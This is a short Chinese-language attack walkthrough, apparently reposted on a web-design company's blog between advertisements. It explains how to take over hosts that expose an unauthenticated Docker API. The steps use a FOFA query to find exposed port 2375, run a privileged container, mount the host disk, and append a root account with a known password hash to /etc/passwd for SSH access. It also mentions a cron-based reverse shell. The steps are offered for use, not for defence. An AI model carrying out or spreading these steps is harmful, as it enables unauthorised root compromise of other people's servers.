1、fofa關鍵字 port=“2375” && body=“page not found”

2、docker -H tcp://ip:port 可查看到當前所有的實例

3、docker -H tcp://ip:port pull alpine

4、docker -H tcp://ip:port run -it --privileged alpine bin/sh

創(chuàng)新互聯(lián)建站-專業(yè)網(wǎng)站定制、快速模板網(wǎng)站建設、高性價比泰安網(wǎng)站開發(fā)、企業(yè)建站全套包干低至880元,成熟完善的模板庫,直接使用。一站式泰安網(wǎng)站制作公司更省心,省錢,快速模板網(wǎng)站建設找我們，業(yè)務覆蓋泰安地區(qū)。費用合理售后完善，10多年實體公司更值得信賴。

5、fdisk -l 查看其分區(qū)結(jié)構(gòu)

6、創(chuàng)建一個test目錄，并且將其 /dev/vda2 掛載至test

7、通過whoami 和id可查看到當前的權(quán)限是root

8、cat /etc/passwd 查看當前所有的用戶信息

9、通過如下命令強制將賬號sql 密碼123 寫入其passwd文件
echo “sql:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash” >>/test/etc/passwd

10、現(xiàn)在即可通過新加的賬號sql:123去ssh連接，此時已經(jīng)成功連接上

常見問題：
1、掛載其分區(qū)后并未能將賬號加進去，原因是你掛載的分區(qū)可能不是其主節(jié)點，嘗試掛載其他分區(qū)
2、成功寫入賬號后無法ssh連接，可通過cat test/etc/ssh/ssh_config 看起ssh配置文件是否限制了ssh賬號密碼登錄，如果是可直接通過vi命令改回來
3、可通過定時任務的方式反彈shell，解決一切難題

你是否還在尋找穩(wěn)定的海外服務器提供商？創(chuàng)新互聯(lián)www.cdcxhl.cn海外機房具備T級流量清洗系統(tǒng)配攻擊溯源，準確流量調(diào)度確保服務器高可用性，企業(yè)級服務器適合批量采購，新人活動首月15元起，快前往官網(wǎng)查看詳情吧

分享文章：實戰(zhàn)Docker未授權(quán)訪問提權(quán)-創(chuàng)新互聯(lián)
本文路徑：http://jinyejixie.com/article32/coicpc.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián)，為您提供移動網(wǎng)站建設、網(wǎng)站設計公司、品牌網(wǎng)站建設、做網(wǎng)站、搜索引擎優(yōu)化、微信小程序

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)